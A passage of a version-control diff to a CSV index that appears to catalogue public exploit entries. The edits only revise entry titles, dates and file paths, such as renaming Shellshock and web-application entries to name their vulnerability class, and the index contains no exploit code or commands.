Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 @@ -14142,8 +14143,8 @@ id,file,description,date,author,platform,type,port 28602,platforms/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",multiple,remote,0 28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,linux,remote,0 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 -28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 -28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 +28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 +28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 28643,platforms/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0 28681,platforms/windows/remote/28681.rb,"freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)",2013-10-02,Metasploit,windows,remote,21 @@ -14164,8 +14165,8 @@ id,file,description,date,author,platform,type,port 28849,platforms/windows/remote/28849.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal",2006-10-24,"Tan Chew Keong",windows,remote,0 28850,platforms/windows/remote/28850.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",windows,remote,0 28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,windows,remote,0 -28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 -28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 +28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6 - Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 +28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6 - Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0 28887,platforms/java/remote/28887.txt,"Sun Java System 6.x - Messenger Express Cross-Site Scripting",2006-10-31,Handrix,java,remote,0 28888,platforms/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,hardware,remote,0 @@ -14186,7 +14187,7 @@ id,file,description,date,author,platform,type,port 29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,windows,remote,12397 29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,windows,remote,8080 29132,platforms/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,unix,remote,80 -29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 +29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 29167,platforms/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 @@ -14225,7 +14226,7 @@ id,file,description,date,author,platform,type,port 30018,platforms/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 30019,platforms/windows/remote/30019.c,"CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution",2007-05-09,binagres,windows,remote,0 30025,platforms/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 (Multiple Scripts) - Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote,0 -30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Unspecified Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 +30026,platforms/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Directory Traversal",2007-05-11,"Digital Defense",windows,remote,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client - 'DAPCNFSD.dll' Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 @@ -14499,7 +14500,7 @@ id,file,description,date,author,platform,type,port 40354,platforms/android/remote/40354.txt,"Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow",2016-09-08,"Google Security Research",android,remote,0 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0 -31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Unspecified",2008-03-25,"Nicholas Gregorie",novell,remote,0 +31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x - eMBox Utility 'edirutil' Command Exploit",2008-03-25,"Nicholas Gregorie",novell,remote,0 31534,platforms/windows/remote/31534.html,"LeadTools MultiMedia 15 - 'LTMM15.dll' ActiveX Control Arbitrary File Overwrite",2008-03-25,shinnai,windows,remote,0 31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 - Request File Directory Traversal",2007-11-10,teeed,windows,remote,0 31540,platforms/linux/remote/31540.php,"PECL 3.0.x - Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow",2008-03-26,dannyp,linux,remote,0 @@ -14653,7 +14654,7 @@ id,file,description,date,author,platform,type,port 32690,platforms/linux/remote/32690.txt,"xterm - DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - libaudiofile 'msadpcm.c .WAV' File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 -32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products - Unspecified Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 +32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products - Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector - Directory Traversal (Metasploit)",2014-04-07,Metasploit,windows,remote,8080 32738,platforms/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution",2014-04-08,Vulnerability-Lab,ios,remote,0 @@ -14677,7 +14678,7 @@ id,file,description,date,author,platform,type,port 32904,platforms/windows/remote/32904.rb,"Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)",2014-04-16,Metasploit,windows,remote,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 -32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote,0 +32832,platforms/windows/remote/32832.py,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote,0 32834,platforms/linux/remote/32834.txt,"cURL/libcURL 7.19.3 - HTTP 'Location:' Redirect Security Bypass",2009-03-03,"David Kierznowski",linux,remote,0 32837,platforms/linux/remote/32837.py,"Wesnoth 1.x - PythonAI Remote Code Execution",2009-02-25,Wesnoth,linux,remote,0 32839,platforms/multiple/remote/32839.txt,"IBM Websphere Application Server 6.1/7.0 - Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote,0 @@ -15003,7 +15004,7 @@ id,file,description,date,author,platform,type,port 34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)",2014-09-24,Metasploit,windows,remote,3000 34757,platforms/windows/remote/34757.rb,"Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit)",2014-09-24,Metasploit,windows,remote,0 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0 -34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 +34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Command Injection (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80 34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 - 'tg-scan.dll' DLL Loading Arbitrary Code Execution",2010-09-27,anT!-Tr0J4n,windows,remote,0 34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",multiple,remote,0 @@ -15028,10 +15029,10 @@ id,file,description,date,author,platform,type,port 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 - DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-19,anT!-Tr0J4n,windows,remote,0 34870,platforms/windows/remote/34870.html,"VideoLAN VLC Media Player 1.1.4 Mozilla MultiMedia Plugin - Remote Code Execution",2010-10-19,shinnai,windows,remote,0 -34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0 +34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Command Injection (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0 -34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 -34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 +34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Command Injection (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 +34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Command Injection (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 34925,platforms/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443 @@ -15182,7 +15183,7 @@ id,file,description,date,author,platform,type,port 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration",2011-05-26,"Francesco Tornieri",linux,remote,0 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 -35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 +35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 35817,platforms/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 @@ -15398,7 +15399,7 @@ id,file,description,date,author,platform,type,port 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)",2015-08-18,Metasploit,win_x86,remote,8443 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,python,remote,0 -37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 +37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Remote Code Execution",2012-09-24,kb,linux,remote,0 37840,platforms/windows/remote/37840.txt,"Flash Broker-Based - Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0 37841,platforms/windows/remote/37841.txt,"Flash Broker-Based - Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0 37842,platforms/windows/remote/37842.txt,"Flash Broker-Based - Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0 @@ -15544,7 +15545,7 @@ id,file,description,date,author,platform,type,port 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 -38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0 +38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Command Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 @@ -15608,7 +15609,7 @@ id,file,description,date,author,platform,type,port 39515,platforms/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0 39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 -39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 +39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 39569,platforms/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22 39585,platforms/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 @@ -15640,7 +15641,7 @@ id,file,description,date,author,platform,type,port 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x (C2 Server) - Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 39917,platforms/cgi/remote/39917.rb,"IPFire - 'proxy.cgi' Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 -39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 +39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Command Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,multiple,remote,8080 40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0 39945,platforms/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,linux,remote,8080 @@ -15696,7 +15697,7 @@ id,file,description,date,author,platform,type,port 40589,platforms/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote,0 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099 -40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0 +40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Command Injection (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0 40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0 40651,platforms/windows/remote/40651.py,"Rumba FTP Client 4.x - Stack Buffer Overflow (SEH)",2016-10-31,"Umit Aksu",windows,remote,0 @@ -15825,7 +15826,7 @@ id,file,description,date,author,platform,type,port 41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80 41942,platforms/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,python,remote,22 41964,platforms/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",macos,remote,0 -41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 +41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80 41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 @@ -16613,7 +16614,7 @@ id,file,description,date,author,platform,type,port 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 -177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 +177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Multiple Vulnerabilities",2000-11-15,keelis,cgi,webapps,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 187,platforms/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 188,platforms/cgi/webapps/188.pl,"UtilMind Mail List 1.7 - Users Can Execute Commands",2000-11-17,teleh0r,cgi,webapps,0 @@ -22485,7 +22486,7 @@ id,file,description,date,author,platform,type,port 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security - Cross-Site Scripting",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injections",2009-10-09,"Andrea Fabrizi",php,webapps,0 -10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - Exploit",2009-10-08,"Mark from infosecstuff",php,webapps,0 +10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - SQL Injection",2009-10-08,"Mark from infosecstuff",php,webapps,0 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-02,CoreLabs,jsp,webapps,0 10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 @@ -22546,7 +22547,7 @@ id,file,description,date,author,platform,type,port 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' SQL Injection",2009-11-25,S@BUN,php,webapps,0 -10228,platforms/php/webapps/10228.txt,"WordPress Plugin WP-Cumulus 1.20 - Exploit",2009-11-25,MustLive,php,webapps,0 +10228,platforms/php/webapps/10228.txt,"WordPress Plugin WP-Cumulus 1.20 - Full Path Disclosure / Cross-Site Scripting",2009-11-25,MustLive,php,webapps,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 10232,platforms/php/webapps/10232.txt,"Joomla! Component com_gcalendar 1.1.2 - 'gcid' SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 @@ -22577,7 +22578,7 @@ id,file,description,date,author,platform,type,port 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusions",2009-12-03,cr4wl3r,php,webapps,0 10284,platforms/php/webapps/10284.txt,"ita-forum 5.1.32 - SQL Injection",2009-11-30,BAYBORA,php,webapps,0 -10285,platforms/php/webapps/10285.txt,"Public Media Manager - Exploit",2009-12-01,cr4wl3r,php,webapps,0 +10285,platforms/php/webapps/10285.txt,"Public Media Manager - Remote File Inclusion",2009-12-01,cr4wl3r,php,webapps,0 10286,platforms/php/webapps/10286.txt,"OpenCSP - Multiple Remote File Inclusions",2009-11-25,EANgel,php,webapps,0 10287,platforms/php/webapps/10287.txt,"MundiMail 0.8.2 - Remote Code Execution",2009-09-07,Dedalo,php,webapps,0 10288,platforms/php/webapps/10288.txt,"SAPID SHOP 1.3 - Remote File Inclusion",2009-12-03,cr4wl3r,php,webapps,0 @@ -22863,7 +22864,7 @@ id,file,description,date,author,platform,type,port 10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection",2009-12-27,"AnGrY BoY",php,webapps,0 10727,platforms/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,php,webapps,0 10728,platforms/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 -10729,platforms/php/webapps/10729.txt,"Joomla! Component com_adagency - Exploit",2009-12-27,FL0RiX,php,webapps,0 +10729,platforms/php/webapps/10729.txt,"Joomla! Component com_adagency - Local File Inclusion",2009-12-27,FL0RiX,php,webapps,0 10730,platforms/php/webapps/10730.txt,"Joomla! Component com_intuit - Local File Inclusion",2009-12-27,FL0RiX,php,webapps,0 10731,platforms/php/webapps/10731.txt,"Joomla! Component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 10732,platforms/php/webapps/10732.txt,"PHP upload - 'unijimpe' Arbitrary File Upload",2009-12-27,"wlhaan hacker",php,webapps,0 @@ -23238,7 +23239,7 @@ id,file,description,date,author,platform,type,port 11446,platforms/php/webapps/11446.txt,"Mambo Component AkoGallery - SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Arbitrary File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 -11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 +11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,php,webapps,0 11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection",2010-02-14,kaMtiEz,php,webapps,0 11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0 11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) - SQL Injection",2010-02-15,10n1z3d,php,webapps,0 @@ -23788,7 +23789,6 @@ id,file,description,date,author,platform,type,port 12333,platforms/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps,0 12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL 